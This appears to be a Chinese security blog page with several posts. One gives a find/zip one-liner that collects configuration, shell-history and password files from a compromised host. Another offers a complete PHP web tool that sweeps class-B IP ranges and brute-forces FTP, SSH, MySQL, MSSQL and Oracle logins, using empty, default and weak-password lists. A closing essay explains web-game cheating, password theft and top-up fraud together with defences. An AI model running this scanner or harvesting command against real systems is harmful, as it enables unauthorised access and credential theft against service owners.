Insight-labs

Author:hip

找出所有.sh .pl .py .conf .cnf .ini .*history .*pass* (/usr/share目录里面的除外) 并且在当前目录zip打包。有些时候很多配置文件的权限配置不严，如果搜集完全的话对于进行下一步有很大帮助。

Find all .sh .pl .py .conf .cnf .ini .*history .*pass* (Except in /usr/share) then zip in current directory

find / \! -path “/usr/share/*” -regex “.*\.sh$\|.*\.pl$\|.*\.py$\|.*\.conf$\|.*\.cnf$\|.*\.ini$\|.*\/\..*history$\|.*\/\..*pass.*” -print|zip pack.zip -@

前几天没事蛋疼的时候写的，可以扫描B段IP外加根据字典破解一些服务的密码，比如FTP,SSH,MySQL,MSSQL,Oracle之类，会自动尝试空密码和弱密码，比如ftp的匿名登录，mssql的sa空密码，oracle的默认密码之类。

扫描和破解均为单线程，多线程需要pcntl支持，因为PHP默认不带这个功能，所以没加多线程，慢点就慢吧

因为Web服务器超时的关系，所以建议每次扫50个IP比较好。

<?php

#Class B PHP port scanner by anthrax @ insight-labs.org
session_start();
set_time_limit(0);
ob_implicit_flush(True);
ob_end_flush();

function check_port($ip,$port,$timeout=0.1) {
 $conn = @fsockopen($ip, $port, $errno, $errstr, $timeout);
 if ($conn) {
 fclose($conn);
 return true;
 }
}
function crackpwd($addr,$port,$userlist,$passlist,$type){
switch($type){

case 'ftp':
$ftp=@ftp_connect($addr,$port);
if(@ftp_login($ftp,'anonymous','safasf#asfs.com')){
echo "$addr".':'.$port.' Anonymous Login enabled'.'<br/>';
}
foreach($userlist as $username){
foreach($passlist as $pass){
if(@ftp_login($ftp,$username,$pass)){
echo "FTP $addr".':'.$port.'Username: '.$username.' pwd: '.$pass.'<br/>';
}
}
}
ftp_close($ftp);
break;

case 'mysql':

if(@mysql_connect($addr.':'.$port, 'root', '')){
echo 'MySQL Username: root EMPTY PASSWORD<br/>';
}
foreach($userlist as $username){
foreach($passlist as $pass){
if(@mysql_connect($addr.':'.$port, $username, $pass)){
echo 'MySQL Username: '.$username.' pwd: '.$pass.'<br/>';
}
}
}
break;

case 'mssql':
if(@mssql_connect($addr,'sa','')){
echo 'MSSQL Username: sa EMPTY PASSWORD<br/>';
}
foreach($userlist as $username){
foreach($passlist as $pass){
if(@mssql_connect($addr, $username, $pass)){
echo 'MSSQL Username: '.$username.' pwd: '.$pass.'<br/>';
}
}
}
break;

case 'oracle':
if(@oci_connect('SCOTT','TIGER',$addr)){
echo 'Oracle Username SCOTT pwd: TIGER';
}
if(@oci_connect('SYSTEM','MANAGER',$addr)){
echo 'Oracle Username SYSTEM pwd: MANAGER';
}
if(@oci_connect('DBSNMP','DBSNMP',$addr)){
echo 'Oracle Username DBSNMP pwd: DBSNMP';
}
foreach($userlist as $username){
foreach($passlist as $pass){
if(@oci_connect($username,$pass,$addr)){
echo 'Oracle Username: '.$username.' pwd: '.$pass.'<br/>';
}
}
}
break;

case 'ssh':
$ssh=@ssh2_connect($addr,'22');
foreach($userlist as $username){
foreach($passlist as $pass){
if(@ssh2_auth_password($ssh,$username,$pass)){
echo 'SSH Username: '.$username.' pwd: '.$pass.'<br/>';
}
}
}
break;
}
}

function scanip($ip,$timeout){
$portarr=array(
'21'=>'FTP',
'22'=>'SSH',
'23'=>'Telnet',
'25'=>'SMTP',
'79'=>'Finger',
'80'=>'HTTP',
'81'=>'HTTP/Proxy',
'110'=>'POP3',
'135'=>'MS Netbios',
'139'=>'MS Netbios',
'143'=>'IMAP',
'162'=>'SNMP',
'389'=>'LDAP',
'443'=>'HTTPS',
'445'=>'MS SMB',
'873'=>'rsync',
'1080'=>'Proxy/HTTP Server',
'1433'=>'MS SQL Server',
'2433'=>'MS SQL Server Hidden',
'1521'=>'Oracle DB Server',
'1522'=>'Oracle DB Server',
'3128'=>'Squid Cache Server',
'3129'=>'Squid Cache Server',
'3306'=>'MySQL Server',
'3307'=>'MySQL Server',
'3500'=>'Squid Cache Server',
'3389'=>'MS Terminal Service',
'5800'=>'VNC Server',
'5900'=>'VNC Server',
'8080'=>'Proxy/HTTP Server',
'10000'=>'Webmin',
'11211'=>'Memcached'

);
foreach($portarr as $port=>$name){
if(check_port($ip,$port,$timeout=0.1)==True){
echo 'Port: '.$port.' '.$name.' is open<br/>';
@ob_flush();
@flush();

if(isset($_SESSION['crack'])||$_SESSION['crack']==true){
switch($port){

case '21':
$type='ftp';
break;

case '22':
$type='ssh';
break;

case '1433':
$type='mssql';
break;

case '1521':
case '1522':
$type='oracle';
break;

case '3306':
case '3307':
$type='mysql';
break;

default:
$type=false;
}
if($type){
global $userarr,$passarr;
crackpwd($ip,$port,$userarr,$passarr,$type);

@ob_flush();
@flush();
}

}//if
}
}
}

if(!isset($_SESSION['startip'])){
$_SESSION['startip']='Start IP';
$_SESSION['endip']='End IP';
$_SESSION['username']='root
admin';
$_SESSION['password']='123456
root
123123
admin
qwerty';
}

echo '<html>
<form action="" method="post">
<input type="text" name="startip" value="'.$_SESSION['startip'].'" />
<input type="text" name="endip" value="'.$_SESSION['endip'].'" />
Timeout<input type="text" name="timeout" value="0.1" /><br/>
Auto Crack Password on MSSQL,MYSQL,Oracle,SSH,FTP
<input type="checkbox" name="crack" value="Crack password"><br/>
<textarea rows="10" cols="30" name="username">'.$_SESSION['username'].'
</textarea>
<textarea rows="10" cols="30" name="password">'.$_SESSION['password'].'
</textarea><br/>
<button type="submit" name="submit">Scan</button>
</form>
</html>
';
if(isset($_POST['startip'])&&isset($_POST['endip'])&&isset($_POST['timeout'])){
if(isset($_POST['crack'])){
global $userarr,$passarr;
$_SESSION['crack']=true;
$userarr=array_unique(explode("\n",str_replace("\r", "", $_POST['username'])));
$passarr=array_unique (explode("\n",str_replace("\r", "", $_POST['password'])));
$_SESSION['username']=$_POST['username'];
$_SESSION['password']=$_POST['password'];
}
$startip=$_POST['startip'];
$endip=$_POST['endip'];
$timeout=$_POST['timeout'];
$siparr=explode('.',$startip);
$eiparr=explode('.',$endip);
$ciparr=$siparr;
if(count($ciparr)!=4||$siparr[0]!=$eiparr[0]||$siparr[1]!=$eiparr[1]){
exit('IP error: Wrong IP address or Trying to scan class A address');
}
$_SESSION['startip']=$startip;
$_SESSION['endip']=$endip;
if($startip==$endip){
echo 'Scanning IP '.$startip.'<br/>';
@ob_flush();
@flush();
scanip($startip,$timeout);
@ob_flush();
@flush();
exit();
}

if($eiparr[3]!=255){
$eiparr[3]+=1;
}
while($ciparr!=$eiparr){
$ip=$ciparr[0].'.'.$ciparr[1].'.'.$ciparr[2].'.'.$ciparr[3];
echo '<br/>Scanning IP '.$ip.'<br/>';
@ob_flush();
@flush();
scanip($ip,$timeout);
$ciparr[3]+=1;

if($ciparr[3]>255){
$ciparr[2]+=1;
$ciparr[3]=0;
}
if($ciparr[2]>255){
$ciparr[1]+=1;
$ciparr[2]=0;
}
}
}else{
exit('Missing input');
}
?>

去年9月份总结的东西了，花了一个多月的时间，里面的每个例子poc都亲自做过测试，总结的很详细。
Fuzzing的一些思想，一些poc是如何一步一步变化的。不管你菜鸟还是大牛，仔细看看总会有收获的。
文章篇幅较长，wp发不了，就放在单独的一个html页面了。
http://insight-labs.org/Browser%20Security.html

网页游戏的安全问题，在刚入职接触的时候，写过两篇比较浅显的文章《网页外挂防御有感》和《网页游戏常见外挂原理及防御》。算算时间，距离现在也有一年多了，虽然页游安全总体上并没有显著变化，没有新的攻击方法，也没有新的防御方法，我个人的工作重心也由页游安全转向了手游安全，但出于完美主义的偏执，还是希望写一篇覆盖完整的页游安全文章，希望能给页游产业一点帮助。

正常的SWF文件，文件头部是由一个三字节的标识符开始，为0×46、0×57、0×53（“FWS”）或者0×43、0×57、0×53（“CWS”）其中之一。“FWS”标识符说明该文件是未压缩的SWF文件，“CWS”标识符则说明该文件前8个字节之后（即文件长度字段之后）的全部数据为开源的标准ZLIB方式压缩

例如下图就是游戏协议对应的命令号

二、自动游戏+加速

自动游戏，简单的说就是模拟鼠标或键盘对游戏UI的操作，代替你做重复的工作。最简单的自动游戏脚本可以使用按键精灵来制作，先对正常操作进行录制，然后编辑，设置热键，最后回放即可。程序实现中一般会有以下几个关键函数

（1）模拟键盘

VOID keybd_event(
BYTE bVk, // 虚拟键码
BYTE bScan, // 扫描码
DWORD dwFlags,
ULONG_PTR dwExtraInfo // 附加键状态
)

（2）模拟鼠标

VOID mouse_event(
DWORD dwFlags, // motion and click options
DWORD dx, // horizontal position or change
DWORD dy, // vertical position or change
DWORD dwData, // wheel movement
ULONG_PTR dwExtraInfo // application-defined information
)

自动游戏的作弊方式常见于对战刷怪类游戏，自动识别地图中怪物出现的位置，自动出招打怪，自动拾取掉落宝物。往往还会配合加速外挂，总的来说，就是靠达成那种不知疲倦（脚本操作）、准确度高（自动识别地图中UI特征）、快速（对页游就是加速flash的动画播放速度）的操作方式来快速升级。

自动游戏类型外挂的防御比较简单，增加人机识别的因素，类似于论坛避免批量注册，采用只有人类才能识别的验证码（题外话，不少网站的验证码其实可以机器识别），例如对于对战类游戏，记录每次对战的频率和操作时间特性，对异常的操作弹出图片验证，中断自动游戏。

在实施图片验证的时候，要考虑到两个要素：

一是图片是否真正的机器难以识别，要预防简单的像素采集技术；

二是图片库是否及时更新，要预防图片库的遍历。

而加速外挂，也常见于对战类游戏。改变操作速度有两种情况。一种是使用变速齿轮之类的加速外挂加快flash动画播放速度，一种是速度值为游戏中的某个变量值，修改了对应的数值。

对于加快flash动画播放速度的加速外挂，我们可以通过对比客户端服务端时间是否同步来检测，当检测到异常的时候，可以弹出图片验证，中断加速。

对于速度由游戏中数值控制的，做好协议安全，使其无法改封包中对应的数值；做好SWF反逆向保护，使其无法修改源码中控制速度的逻辑。

三、内存安全：内存修改

修改游戏在内存中的数值是经典的单机游戏作弊方法，同样也适用于网页游戏，原因很简单，不可能每个来自客户端的数据，服务端都做验证。（看看页游公司开发前端和后台的比例吧！）以社交类网页游戏为例，其中会内嵌不少小游戏，这些小游戏可能是用来赚取游戏经验或货币等数值的，很显然，这种类型的小游戏基本就是主逻辑在客户端的单机游戏，只是最后将游戏分数上传给服务器，服务器再根据游戏分数的不同来下发相应数额的游戏货币。我们完全可以在积分上传前，在内存中查找并修改该数值。 如下图所示，用cheat engine去查找IE进程中游戏分数。

（cheat engine是我最喜欢的内存修改工具，手游上的内存修改工具和这个比起来简直是胎儿版的。该工具支持自定义格式的内存搜索，具备强大的反汇编功能，更妙的是可以直接生成外挂，特别赞的是竟然采用了游戏通关的方式来教授工具使用，我的博客中有第八关于第九关通关方法）

程序实现一般会有以下几个关键函数

（1）读取进程数据ReadProcessMemory

（2） 查找，查找算法可以按数值类型、扫描类型及内存扫描方式来实现

例如数值类型有二进制，1字节，2字节，4字节（游戏最常用），8字节，浮点数，双浮点数，文本，字节数组，自定义（这个最牛）；

例如扫描类型可以支持精确查找，模糊查找（比…大，比…小，两者之间），数值变化趋势（数值处于增加中，数值出于减少中，数值没有变动，与首次扫描数值相同，数值增加了某个指定值，数值减少了某个指定值）；

例如内存扫描方式有自定义扫描起始与终止地址，同时扫描只读内存，深度扫描，快速扫描，扫描时暂停游戏

（3）写数据WriteProcessMemory

内存修改的防御，有以下几种建议：

（1）重要数值在内存中拆分存放，使其无法简单定位到（会使得游戏逻辑变复杂）

（2）默认可以修改，在服务端控制收益上线。（考虑到成本，为目前主流控制方法）

四、存档安全：存档修改

在flas在flash单机游戏时代，修改本地存档文件，是游戏作弊的重要方式，相信有不少人就用过Flash存档修改器。

              随着页游兴起到现在的页游繁盛，依赖于存档进行逻辑判断的设计减少了，但这块也不能完全忽略掉。总会有一些功能是需要调用本地存档的。例如登录模块中，记住密码功能，会将密码信息存储在本地，以IE浏览器为例，在C:\Documents and Settings\（你的Windows用户名）\Application Data\Macromedia \Flash Player\#SharedObjects\（一些随机数字和字母）\ 文件夹下就可以看到存储密码的SOL文件，可以使用minerva工具查看，如下图所示，密码明文明文存储的，SOL文件是永久性保存的，除非手动清除，如果玩家在公共环境下登录，就会有盗号威胁。

也有些开发意识到了这个问题，而采用加密存储方式，一般采用md5（其实md5不是真正的加密算法）。md5解密的在线网站非常多，如下图所示，密码通过两次md5后存储，我们可以在http://www.cmd5.com/ 查到。

所以建议存档加密，采用自定义的加密算法，例如md5后转置再md5，等等。

五、帐号安全/充值安全：盗号/低价充值

帐号安全和充值安全不仅页游如此，所有游戏，甚至所有线上应用都如此。如果说开是个大的话题，我仅仅介绍页游中常见的威胁与防御。

（一）、帐号安全

威胁：

1.外挂盗号

例如下面号称可以无限刷取游戏货币的外挂，实际上在用户输入帐号和密码后，将信息发送给盗号者的邮箱。

2. 社工盗号

在游戏中获取信任，以为对方代练等好处为引诱盗取帐号。或通过获取个人信息，从密保问题下手进行盗号。

3.从游戏的帐号管理中心等web入口下手，进行盗号。

例如登录模块没有验证码或验证码实现机制漏洞，使用字典扫描批量盗号

4.传输嗅探盗号

5.利用帐号申诉流程漏洞进行盗号

例如有些申诉打分机制存在提供多次充值证明就可以取回密码的方式，先充值，再盗号。

防御：

1.安全意识宣传

2.弱口令检测

3.异地登录提醒

4.登录行为监控

5.设计好帐号相关功能，例如申诉流程

（二）、充值安全

威胁：

1.社工

在网上发帖慌称发现充值漏洞，骗取贪心网友给自己指定的帐号进行充值

2.利用手机充值漏洞

使用快过期的手机废卡进行充值，大多数的充值不会再次检测手机卡是否存活状态

3.利用宽带充值漏洞

盗取宽带帐号进行充值，由于不会实际影响游戏收益，顶多会出现受害者损失严重的情况下投诉带来的不好影响。

4. 真正的充值漏洞

比如说广泛采用的点卡充值，可能存在点卡被重放使用的漏洞

防御：

1.安全意识宣传

2.充值相关功能的安全检测

结论

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

总的来说，页游的各种外挂问题很普遍，端游有的它都有，但安全防御不如端游，这很大程度上是因为页游的开发周期短，生存周期也短，例如较长的神仙道游页才两年了，甚至大多数页游，只是为了短时间洗用户抢钱，因此不会投入人力物力在外挂防御方面，或许第三方的安全服务会有点市场吧，比如说他们乐意购买支持多项目的AS混淆工具。总之，页游是个浮躁的市场，只有生命周期强大的游戏，才会注意到外挂问题。

参考文章：

http://blog.sina.com.cn/s/blog_731fdd2b01010u9k.html